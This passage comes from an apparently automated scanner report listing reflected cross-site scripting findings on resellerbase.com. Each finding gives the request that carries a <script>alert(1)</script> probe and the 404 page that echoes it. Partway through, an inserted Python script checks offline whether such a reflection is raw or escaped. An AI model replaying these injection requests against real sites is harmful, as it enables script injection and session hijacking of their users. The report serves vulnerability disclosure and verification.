Host:   http://www.resellerbase.com
Path:   /detail/42/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c9bc<script>alert(1)</script>97a534ecef8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/427c9bc<script>alert(1)</script>97a534ecef8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/427c9bc<script>alert(1)</script>97a534ecef8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3008. http://www.resellerbase.com/detail/42/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 67c22<script>alert(1)</script>6c6034a50a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/search.php67c22<script>alert(1)</script>6c6034a50a4?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php67c22<script>alert(1)</script>6c6034a50a4?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3009. http://www.resellerbase.com/detail/42/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9d84d<a>d7bd3fe29b6 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/search.php?keyword=search...&Submit3=Search9d84d<a>d7bd3fe29b6&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php?keyword=search...&Submit3=Search9d84d<a>d7bd3fe29b6&opt=2 was not found on this server.</p>
...[SNIP]...

2.3010. http://www.resellerbase.com/detail/42/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6bfb0<a>a8b35bd5189 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/search.php?keyword=search...6bfb0<a>a8b35bd5189&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php?keyword=search...6bfb0<a>a8b35bd5189&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3011. http://www.resellerbase.com/detail/42/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 21ad4<script>alert(1)</script>d82b2d18064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/search.php?keyword=search...&Submit3=Search&opt=2&21ad4<script>alert(1)</script>d82b2d18064=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php?keyword=search...&Submit3=Search&opt=2&21ad4<script>alert(1)</script>d82b2d18064=1 was not found on this server.</p>
...[SNIP]...
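Added example, not part of the XSS.CX report and not resellerbase.com's code: an offline check of the finding above. It parses a captured HTTP response, confirms the body is served as HTML (a reflection into JSON or plain text is not XSS), and classifies how the scanner's probe came back: verbatim, entity-escaped, percent-encoded, or absent. The response text is constructed from the headers and the <p> line of finding 2.3011; render_404_fixed is an assumed corrected version of that page's echo, not code from the site.

```python
"""Offline verification of a reflected-XSS finding (added example).

RAW_RESPONSE is constructed from the 404 page in finding 2.3011; the status
line, headers and <p> line are the report's, the rest of the body is assumed.
"""
import html
from urllib.parse import quote

PAYLOAD = "21ad4<script>alert(1)</script>d82b2d18064"   # probe from finding 2.3011
REQUEST_URI = ("/detail/42/search.php?keyword=search...&Submit3=Search&opt=2&"
               + PAYLOAD + "=1")

# Constructed capture, CRLF line endings as on the wire.
RAW_RESPONSE = (
    "HTTP/1.0 404 Not Found\r\n"
    "Server: Apache/2\r\n"
    "X-Powered-By: PHP/5.2.14\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><head><title>Error 404 - Page Not Found</title></head><body>\r\n"
    "<p>The requested URL " + REQUEST_URI + " was not found on this server.</p>\r\n"
    "</body></html>\r\n"
)


def split_response(raw: str):
    """Return (status_line, {lowercased header: value}, body) for an HTTP/1.x response."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_html(headers: dict) -> bool:
    """A reflection is only XSS if the browser will parse the body as HTML."""
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    return ctype in ("text/html", "application/xhtml+xml")


def reflection_status(body: str, payload: str) -> str:
    """'raw'     : exact copy, tags intact, the script will run
       'escaped' : only the entity-encoded form is present (inert in a text context)
       'encoded' : only a percent-encoded form is present (inert as HTML)
       'absent'  : not reflected at all"""
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    if quote(payload, safe="") in body:
        return "encoded"
    return "absent"


def reflection_context(body: str, payload: str, width: int = 30) -> str:
    """Text around a raw reflection, to judge the injection context by eye."""
    i = body.find(payload)
    return "" if i < 0 else body[max(0, i - width): i + len(payload) + width]


def assess(raw: str, payload: str) -> dict:
    """One finding -> {'html': bool, 'status': str, 'context': str}."""
    _, headers, body = split_response(raw)
    return {"html": is_html(headers),
            "status": reflection_status(body, payload),
            "context": reflection_context(body, payload)}


def render_404_fixed(request_uri: str) -> str:
    """Assumed corrected sink: the same <p> line, with the echoed URI
    entity-encoded for an HTML text context."""
    return ("<p>The requested URL " + html.escape(request_uri, quote=True)
            + " was not found on this server.</p>")


if __name__ == "__main__":
    result = assess(RAW_RESPONSE, PAYLOAD)
    print(result["html"], result["status"])
    print(result["context"])
    print(reflection_status(render_404_fixed(REQUEST_URI), PAYLOAD))
```

Run stand-alone it reports the captured page as HTML with a raw reflection, shows the text around the probe (a plain-text position between tags, as the scanner states), and reports the corrected template as escaped. The status check is what separates a Certain finding from a scanner false positive: a probe that comes back only as `&lt;script&gt;` or `%3Cscript%3E` is not exploitable as HTML.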

2.3012. http://www.resellerbase.com/detail/42/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f8d67<a>667639d24de was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the reflection here is the same 404 page that echoes the requested URL, and for other parameters of this request (see 2.3011) that page reflects a full <script> payload unmodified; the lower confidence records only that the scanner's probe for this parameter was a bare <a> tag, not that a filter was observed.

Request

GET /detail/42/search.php?keyword=search...&Submit3=Search&opt=2f8d67<a>667639d24de HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/search.php?keyword=search...&Submit3=Search&opt=2f8d67<a>667639d24de was not found on this server.</p>
...[SNIP]...

2.3013. http://www.resellerbase.com/detail/42/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0298<script>alert(1)</script>8047e61564b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf0298<script>alert(1)</script>8047e61564b/42/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf0298<script>alert(1)</script>8047e61564b/42/themes/ was not found on this server.</p>
...[SNIP]...

2.3014. http://www.resellerbase.com/detail/42/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bfdff<script>alert(1)</script>c560e2c3af9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42bfdff<script>alert(1)</script>c560e2c3af9/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42bfdff<script>alert(1)</script>c560e2c3af9/themes/ was not found on this server.</p>
...[SNIP]...

2.3015. http://www.resellerbase.com/detail/42/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa0dd<script>alert(1)</script>26dbcd7bd2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesaa0dd<script>alert(1)</script>26dbcd7bd2e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesaa0dd<script>alert(1)</script>26dbcd7bd2e/ was not found on this server.</p>
...[SNIP]...

2.3016. http://www.resellerbase.com/detail/42/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 52cf5<script>alert(1)</script>9566d96113a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/?52cf5<script>alert(1)</script>9566d96113a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/?52cf5<script>alert(1)</script>9566d96113a=1 was not found on this server.</p>
...[SNIP]...

2.3017. http://www.resellerbase.com/detail/42/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e0eb<script>alert(1)</script>f8649d05957 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2e0eb<script>alert(1)</script>f8649d05957/42/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2e0eb<script>alert(1)</script>f8649d05957/42/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3018. http://www.resellerbase.com/detail/42/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54aa2<script>alert(1)</script>fc05a396d7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4254aa2<script>alert(1)</script>fc05a396d7c/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4254aa2<script>alert(1)</script>fc05a396d7c/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3019. http://www.resellerbase.com/detail/42/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f77b3<script>alert(1)</script>41fe4580ed8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesf77b3<script>alert(1)</script>41fe4580ed8/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesf77b3<script>alert(1)</script>41fe4580ed8/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3020. http://www.resellerbase.com/detail/42/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f40d<script>alert(1)</script>0641944d885 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos7f40d<script>alert(1)</script>0641944d885/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos7f40d<script>alert(1)</script>0641944d885/ was not found on this server.</p>
...[SNIP]...

2.3021. http://www.resellerbase.com/detail/42/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7eef2<script>alert(1)</script>13ab1936556 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/?7eef2<script>alert(1)</script>13ab1936556=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/?7eef2<script>alert(1)</script>13ab1936556=1 was not found on this server.</p>
...[SNIP]...

2.3022. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a43b<script>alert(1)</script>f17f84a56fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7a43b<script>alert(1)</script>f17f84a56fc/42/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7a43b<script>alert(1)</script>f17f84a56fc/42/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3023. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f293f<script>alert(1)</script>3922cbd8bd5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42f293f<script>alert(1)</script>3922cbd8bd5/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42f293f<script>alert(1)</script>3922cbd8bd5/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3024. http://www.resellerbase.com/detail/42/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bc092<script>alert(1)</script>fba3fdb90a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesbc092<script>alert(1)</script>fba3fdb90a2/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
